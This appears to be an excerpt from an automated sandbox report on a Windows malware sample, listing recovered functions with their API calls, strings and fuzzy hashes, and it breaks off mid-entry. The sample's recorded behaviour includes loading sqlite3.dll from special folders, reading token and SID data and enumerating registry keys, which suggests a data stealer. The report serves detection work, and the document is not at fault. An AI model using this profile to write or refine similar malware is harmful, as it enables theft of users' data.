                                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 002A7DF1
                                                          • GlobalFree.KERNEL32(00000000), ref: 002A7E11
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                          • String ID:
                                                          • API String ID: 857934279-0
                                                          • Opcode ID: f7ae03d04bcf4bcea9be981246b4f95a5eb60c21456bc1f444ef70093901814f
                                                          • Instruction ID: fd57fc40955dbf426825a651956723d1ec2885348ac1171bfc3f9caaac77803c
                                                          • Opcode Fuzzy Hash: f7ae03d04bcf4bcea9be981246b4f95a5eb60c21456bc1f444ef70093901814f
                                                          • Instruction Fuzzy Hash: 49115B35A14105FBDB209FE1DD49FAF7F78EB05751F1004A5E505E1090EB708A24DB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027CDB1, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 479librarystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027CDB6
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0027CDF3
                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0027CE2B
                                                          • lstrcatW.KERNEL32(?,?), ref: 0027CE6E
                                                            • Part of subcall function 002794E0: __EH_prolog.LIBCMT ref: 002794E5
                                                            • Part of subcall function 002794E0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 002795FD
                                                            • Part of subcall function 002794E0: HeapFree.KERNEL32(00000000,?,?), ref: 00279604
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0027D429
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariablelstrcat
                                                          • String ID: sqlite3.dll
                                                          • API String ID: 3496207294-1155512374
                                                          • Opcode ID: a6c0706986e1bac372897b82dea1413220cc9197a2d7a0e627b13901d1d5e4db
                                                          • Instruction ID: 5cdf71c565b23abf576339a2b0e4270cb5a6ff23a6104c21423d549dce14d054
                                                          • Opcode Fuzzy Hash: a6c0706986e1bac372897b82dea1413220cc9197a2d7a0e627b13901d1d5e4db
                                                          • Instruction Fuzzy Hash: EA12D031D252199FDF14EFA4C859BEEBBB4BF11314F108068E4097B282DB749A55CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A3669, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 286fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A366E
                                                          • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 002A36CC
                                                            • Part of subcall function 002A7BF1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 002A7C16
                                                            • Part of subcall function 002A7BF1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 002A7C4B
                                                          • WriteFile.KERNEL32(?,00000000,?,50504C24,00000000), ref: 002A395A
                                                          • GetLastError.KERNEL32 ref: 002A3974
                                                          • CloseHandle.KERNEL32(00000000), ref: 002A398F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWide$CloseCreateErrorH_prologHandleLastWrite
                                                          • String ID: $LPPTW
                                                          • API String ID: 1278328058-1016409822
                                                          • Opcode ID: 1ff23779b1778eb6ad83130346efe126938da529bb5ffe9d1080cf49a85a3d14
                                                          • Instruction ID: ae1ea6eb702b99d5c22929eac8aef1de7d975755b9218cdb9fffb9859d629de1
                                                          • Opcode Fuzzy Hash: 1ff23779b1778eb6ad83130346efe126938da529bb5ffe9d1080cf49a85a3d14
                                                          • Instruction Fuzzy Hash: 92A19EB1910209AFDB14DBA4CC85AFFBBB8EF09300F00446AF449E7241EBB49A54CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00442C20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00442C57
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00442C5F
                                                          • _ValidateLocalCookies.LIBCMT ref: 00442CE8
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00442D13
                                                          • _ValidateLocalCookies.LIBCMT ref: 00442D68
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: c0f73d81d05a09f537ca0863073cc27e0ee0714cec2df10a2702fcd2f5437cf1
                                                          • Instruction ID: 6dc917fe1f51190c90abd66d76278e3b5df7c3dc57b4ff05460de9a25fec1892
                                                          • Opcode Fuzzy Hash: c0f73d81d05a09f537ca0863073cc27e0ee0714cec2df10a2702fcd2f5437cf1
                                                          • Instruction Fuzzy Hash: 2441E634E002089BDF10DF69C880A9EBBB5BF45328F54805BFC159B392D779EA05CB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A3FAD, Relevance: 10.6, APIs: 7, Instructions: 75stringregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A3FD2
                                                          • lstrlenW.KERNEL32(?), ref: 002A3FF8
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 002A4015
                                                          • lstrcatW.KERNEL32(00000000,0047DE0C), ref: 002A4021
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 002A402F
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002A4063
                                                          • RegCloseKey.ADVAPI32(?), ref: 002A4070
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 2943937744-0
                                                          • Opcode ID: 78cb65f283d8e8838015dcd29c323fc9745513db7ebfca78a49ab22cb2503cf2
                                                          • Instruction ID: 8e1dbb0a583fd432fcb908497bb866286f338314c95137006ca336edee1d37b1
                                                          • Opcode Fuzzy Hash: 78cb65f283d8e8838015dcd29c323fc9745513db7ebfca78a49ab22cb2503cf2
                                                          • Instruction Fuzzy Hash: 1A2149B5401128BFEB11AB90DD88DEF7B7CEF06394F004062F949E2111EAB09A509EA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00420116, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: G:\rc-build-v1-exe\json.hpp$cannot get value$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
                                                          • API String ID: 3519838083-3730491859
                                                          • Opcode ID: f49792c5e4f1e6477262a3c47b6aa0ff3ecb67c1087255184dd75c898a0221b3
                                                          • Instruction ID: 99b5c3ad146527391edd5f3ad905f6487279d4199debdbd518e0852b82684b8a
                                                          • Opcode Fuzzy Hash: f49792c5e4f1e6477262a3c47b6aa0ff3ecb67c1087255184dd75c898a0221b3
                                                          • Instruction Fuzzy Hash: 8B21F3307002109FD714EB5AD986EAAB7F4EF81708F54801FE48667792D779ED11CA19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D1345, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002D1091: _free.LIBCMT ref: 002D10B6
                                                          • _free.LIBCMT ref: 002D1393
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002D139E
                                                          • _free.LIBCMT ref: 002D13A9
                                                          • _free.LIBCMT ref: 002D13FD
                                                          • _free.LIBCMT ref: 002D1408
                                                          • _free.LIBCMT ref: 002D1413
                                                          • _free.LIBCMT ref: 002D141E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 7fc3fbf7540436e89252574c01c4b56ab8606f2a28b743f18f6349b8b9664cb0
                                                          • Instruction ID: c9b739f4f04c64aae96515cafb4d526f7c8bad3367fc58abc8741537e35ac9bc
                                                          • Opcode Fuzzy Hash: 7fc3fbf7540436e89252574c01c4b56ab8606f2a28b743f18f6349b8b9664cb0
                                                          • Instruction Fuzzy Hash: DA1190B1610F44BAD520BBB0CC17FDB779D9F08311F48082AB69D66552D734AAB08E41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002BEC80, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F4,G:\rc-build-v1-exe\json.hpp,?), ref: 002BECA0
                                                          • GetFileType.KERNEL32(00000000), ref: 002BECB2
                                                          • swprintf.LIBCMT ref: 002BECD3
                                                          • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 002BED10
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 002BEC9A
                                                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 002BECC8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ConsoleFileHandleTypeWriteswprintf
                                                          • String ID: Assertion failed: %Ts, file %Ts, line %d$G:\rc-build-v1-exe\json.hpp
                                                          • API String ID: 2943507729-2446739629
                                                          • Opcode ID: 3e5cc508526abb63b65f47f70695c46779976d38fd58a10f11fce28493eb44a6
                                                          • Instruction ID: 555e40483071c088393bf70fb6f5b62f38f6795b13d0c3e792c54d9a5bc98ff1
                                                          • Opcode Fuzzy Hash: 3e5cc508526abb63b65f47f70695c46779976d38fd58a10f11fce28493eb44a6
                                                          • Instruction Fuzzy Hash: 0111577150011AABCF20AF29CC85EEE77BCEF45310F514659FE16A3081EA30AD558B68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0044EA30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F4,G:\rc-build-v1-exe\json.hpp,?), ref: 0044EA50
                                                          • GetFileType.KERNEL32 ref: 0044EA62
                                                          • swprintf.LIBCMT ref: 0044EA83
                                                          • WriteConsoleW.KERNEL32 ref: 0044EAC0
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 0044EA4A
                                                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 0044EA78
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ConsoleFileHandleTypeWriteswprintf
                                                          • String ID: Assertion failed: %Ts, file %Ts, line %d$G:\rc-build-v1-exe\json.hpp
                                                          • API String ID: 2943507729-2446739629
                                                          • Opcode ID: 3e5cc508526abb63b65f47f70695c46779976d38fd58a10f11fce28493eb44a6
                                                          • Instruction ID: 0bf84f6389b237df00b867331b3627312fdcf954ca5060b5c05d84965fdf9818
                                                          • Opcode Fuzzy Hash: 3e5cc508526abb63b65f47f70695c46779976d38fd58a10f11fce28493eb44a6
                                                          • Instruction Fuzzy Hash: A8113871500119ABDB20DB2ACC849EF77ACFF85314F50455AFE16A3181EA349D458B68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C7246, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleCP.KERNEL32 ref: 002C728E
                                                          • __fassign.LIBCMT ref: 002C746D
                                                          • __fassign.LIBCMT ref: 002C748A
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002C74D2
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002C7512
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 002C75BE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                          • String ID:
                                                          • API String ID: 4031098158-0
                                                          • Opcode ID: e7873b79e4302506c51b47c3d30267c2c2735e178dc8807b98845d0cb54826ed
                                                          • Instruction ID: 92b3ef3cb99cc2a064a8d3ba768e143d17313ee2b2116267388da5dcdda82e39
                                                          • Opcode Fuzzy Hash: e7873b79e4302506c51b47c3d30267c2c2735e178dc8807b98845d0cb54826ed
                                                          • Instruction Fuzzy Hash: B9D18B71D142999FCB15CFA8D880EEDBBB5BF48314F28026EE855BB242D730A956CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C4048, Relevance: 9.2, APIs: 6, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 002C40D8
                                                          • _free.LIBCMT ref: 002C40F3
                                                          • _free.LIBCMT ref: 002C40FE
                                                          • _free.LIBCMT ref: 002C420B
                                                            • Part of subcall function 002C81BD: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 002C81FE
                                                          • _free.LIBCMT ref: 002C41E0
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002C4201
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$Heap$AllocateErrorFreeLast
                                                          • String ID:
                                                          • API String ID: 4150789928-0
                                                          • Opcode ID: 65171aa452c86e67efc77ce06e6bea77c102cab12ba481b5bf8be829f8d00895
                                                          • Instruction ID: 48b974e90c3d8660849a51cc9c89252ba8cf922bb2014cb751505845dfcba20f
                                                          • Opcode Fuzzy Hash: 65171aa452c86e67efc77ce06e6bea77c102cab12ba481b5bf8be829f8d00895
                                                          • Instruction Fuzzy Hash: 3E51CF36A142025BDF14BF688862FFB77A5CF84310F18035EFD45DB241EA329E12CA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A3285, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 311COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A328A
                                                            • Part of subcall function 002A7BF1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 002A7C16
                                                            • Part of subcall function 002A7BF1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 002A7C4B
                                                          • _strlen.LIBCMT ref: 002A3517
                                                          • _strlen.LIBCMT ref: 002A3521
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_strlen$H_prolog
                                                          • String ID: W?##'$
                                                          • API String ID: 3152227400-3983677542
                                                          • Opcode ID: e99adf2ad196b2b754edb63601f1fde709a54a6ffd569c2ae6aa2dc30fa815e9
                                                          • Instruction ID: 7dcaaa44dd6414503611906f64e2d303ba72aa5b5a001f032a55f4f0c10c453f
                                                          • Opcode Fuzzy Hash: e99adf2ad196b2b754edb63601f1fde709a54a6ffd569c2ae6aa2dc30fa815e9
                                                          • Instruction Fuzzy Hash: 64C19F71911218AFDB15DFA4CC85AFEB7B8EF09300F1081ADE819A7241EB749B54CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B306A, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,002B3061,002B1AD6,002B0259), ref: 002B3078
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002B3086
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B309F
                                                          • SetLastError.KERNEL32(00000000,002B3061,002B1AD6,002B0259), ref: 002B30F1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: f4666fc2ad97d270be6435d9c2a2bd9f0daf06447ec2970fb2af1f9786d4251a
                                                          • Instruction ID: a21e91b7ffef4eea935a3edb6c2fb09216038a39507451f570fd6a7b1581e78b
                                                          • Opcode Fuzzy Hash: f4666fc2ad97d270be6435d9c2a2bd9f0daf06447ec2970fb2af1f9786d4251a
                                                          • Instruction Fuzzy Hash: 1801D83223E2126EA6247AB87CC57EA2BA8DF027F4371463EF510950E1EE624C355758
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00280196, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028019B
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002801A9
                                                          • int.LIBCPMT ref: 002801C0
                                                            • Part of subcall function 00277A47: std::_Lockit::_Lockit.LIBCPMT ref: 00277A58
                                                            • Part of subcall function 00277A47: std::_Lockit::~_Lockit.LIBCPMT ref: 00277A72
                                                          • std::_Facet_Register.LIBCPMT ref: 002801FA
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00280210
                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00280225
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                          • String ID:
                                                          • API String ID: 2251497708-0
                                                          • Opcode ID: 48e2f888b202f36c544d88fc9848485b284310dff139f14bbf91c122f2094152
                                                          • Instruction ID: bd33a847f87a5fe311afafbc3a447cf3e025d6aeb87bd494a17364ef85dba4e4
                                                          • Opcode Fuzzy Hash: 48e2f888b202f36c544d88fc9848485b284310dff139f14bbf91c122f2094152
                                                          • Instruction Fuzzy Hash: 9F1108359311159BCB04EFA8D849AAE7B74FF45320F104619F815672C1DF749D15CBE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A95ED, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A95F2
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002A9600
                                                          • int.LIBCPMT ref: 002A9617
                                                            • Part of subcall function 00277A47: std::_Lockit::_Lockit.LIBCPMT ref: 00277A58
                                                            • Part of subcall function 00277A47: std::_Lockit::~_Lockit.LIBCPMT ref: 00277A72
                                                          • std::_Facet_Register.LIBCPMT ref: 002A9651
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002A9667
                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 002A967C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                          • String ID:
                                                          • API String ID: 2251497708-0
                                                          • Opcode ID: 15e3bd91685e26ec751e42e74c8ab8b333426b1ee6bc5da0d5be2e13b44e5633
                                                          • Instruction ID: 35afb41b46315b20f2e2b53f959b9a3e21ae11662b2d429fc1d73276daff1aab
                                                          • Opcode Fuzzy Hash: 15e3bd91685e26ec751e42e74c8ab8b333426b1ee6bc5da0d5be2e13b44e5633
                                                          • Instruction Fuzzy Hash: 3D1104729201159BCB04EF68C845ABE7B78EF46720F104519F515A72C1EF749E50CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027FA67, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027FA6C
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0027FA7A
                                                          • int.LIBCPMT ref: 0027FA91
                                                            • Part of subcall function 00277A47: std::_Lockit::_Lockit.LIBCPMT ref: 00277A58
                                                            • Part of subcall function 00277A47: std::_Lockit::~_Lockit.LIBCPMT ref: 00277A72
                                                          • std::_Facet_Register.LIBCPMT ref: 0027FACB
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0027FAE1
                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 0027FAF6
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                          • String ID:
                                                          • API String ID: 2251497708-0
                                                          • Opcode ID: 4a6d5781b6c978cb01bb865f71f0ab2ed39eb4a0c37590125ed8faca3a6d3e78
                                                          • Instruction ID: db3c849db125bd391caf568f937e7a37d8670a6c9857e1878e260daa66645cb7
                                                          • Opcode Fuzzy Hash: 4a6d5781b6c978cb01bb865f71f0ab2ed39eb4a0c37590125ed8faca3a6d3e78
                                                          • Instruction Fuzzy Hash: E21104329241159FCB05EF54C949AAE7B78EF45724F11892DF818A7281EF749E10CFE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CF48E, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free_strpbrk
                                                          • String ID: *?
                                                          • API String ID: 3300345361-2564092906
                                                          • Opcode ID: 43bf41650699d7f4c7fbe9bec99b9f09ce8e2286473903658327c69fb58e017f
                                                          • Instruction ID: 2b372942b7711ae8e8810d95d9eb04aa9995dfcb2c7b9f0e2822f8df02d7af4c
                                                          • Opcode Fuzzy Hash: 43bf41650699d7f4c7fbe9bec99b9f09ce8e2286473903658327c69fb58e017f
                                                          • Instruction Fuzzy Hash: FE612E75D1021A9FCB14CFA8C981AEDFBF5EF48350B24826EE915E7300D675AE518B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B3181, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID: @
                                                          • API String ID: 1740715915-1615503679
                                                          • Opcode ID: 288d6c377ee0800ad154adac65f34736da09b6f89e1bb3786170787e38d0c1ec
                                                          • Instruction ID: a87beead8f585ebfcb5bfd86b6603242f62b2e58aeebd24a71f0a3afcb986d1a
                                                          • Opcode Fuzzy Hash: 288d6c377ee0800ad154adac65f34736da09b6f89e1bb3786170787e38d0c1ec
                                                          • Instruction Fuzzy Hash: 1F51E372A21203AFDB29CF54D841BFA77A4EF40790F14452DED1947291E771EEA4CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C145F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D.G
                                                          • API String ID: 0-1802314001
                                                          • Opcode ID: 43d399531a9c278ba7b6647d88ce3753930f8634b4a0a3453fe04221e1d32246
                                                          • Instruction ID: 11ec0e9c4b43e28ed07655cb18701ac383325ef213e6ebd93ddaffd2dd15d646
                                                          • Opcode Fuzzy Hash: 43d399531a9c278ba7b6647d88ce3753930f8634b4a0a3453fe04221e1d32246
                                                          • Instruction Fuzzy Hash: FA41FD71A50744AFD7249F78DC46FAABBE8EF85710F10462EF115DB682D3B199708B80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A7A69, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A7A6E
                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,00000000,00000000), ref: 002A7AEF
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000040), ref: 002A7B3E
                                                          • RegCloseKey.ADVAPI32(?), ref: 002A7B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CloseH_prologOpenQueryValue
                                                          • String ID: @
                                                          • API String ID: 1233982722-2766056989
                                                          • Opcode ID: b7eb85b322e6163570598abfc1bc46022ceb508eb15e9d95566184f66cd3aef9
                                                          • Instruction ID: 862b0992eb4aefa82f5df296181523433c8fef5e83239d564410379a0dda4363
                                                          • Opcode Fuzzy Hash: b7eb85b322e6163570598abfc1bc46022ceb508eb15e9d95566184f66cd3aef9
                                                          • Instruction Fuzzy Hash: CC418071D15298DFDB11CFA8D980AEEBBF8BF05304F14416AE449B7212DB704A48CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004207C7, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: eA$G:\rc-build-v1-exe\json.hpp$is_contiguous$'B
                                                          • API String ID: 3519838083-4021099936
                                                          • Opcode ID: c53e6938cf5b59ace86c46807bbb20daa326f96b6a7c1a524cbdd82e96261066
                                                          • Instruction ID: 1ecaaa2b01bee4a255fb671141951ded287eb88eb350fe3f30680e41c5a7dcbb
                                                          • Opcode Fuzzy Hash: c53e6938cf5b59ace86c46807bbb20daa326f96b6a7c1a524cbdd82e96261066
                                                          • Instruction Fuzzy Hash: 2E4115B1E0424A9FCB09DFA9D4406AEFBF1EF48310B24C46ED859E7342D7349945CBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002938F3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(0046C8B0,00000000,00000015,0046C8D0,?), ref: 00293913
                                                          • StrStrIW.SHLWAPI(?,0047D4D4), ref: 00293964
                                                          • CoTaskMemFree.OLE32(?), ref: 00293982
                                                          • CoTaskMemFree.OLE32(?), ref: 00293990
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: FreeTask$CreateInstance
                                                          • String ID: (
                                                          • API String ID: 2903366249-3887548279
                                                          • Opcode ID: 9818ba29eeceff1be690a684500116c960833161fd111d66c594bdf9318a9f9f
                                                          • Instruction ID: c353f9f8c9c3aa2fd0cea71ffdc39a19793986596c9cb31255546b76033c0cad
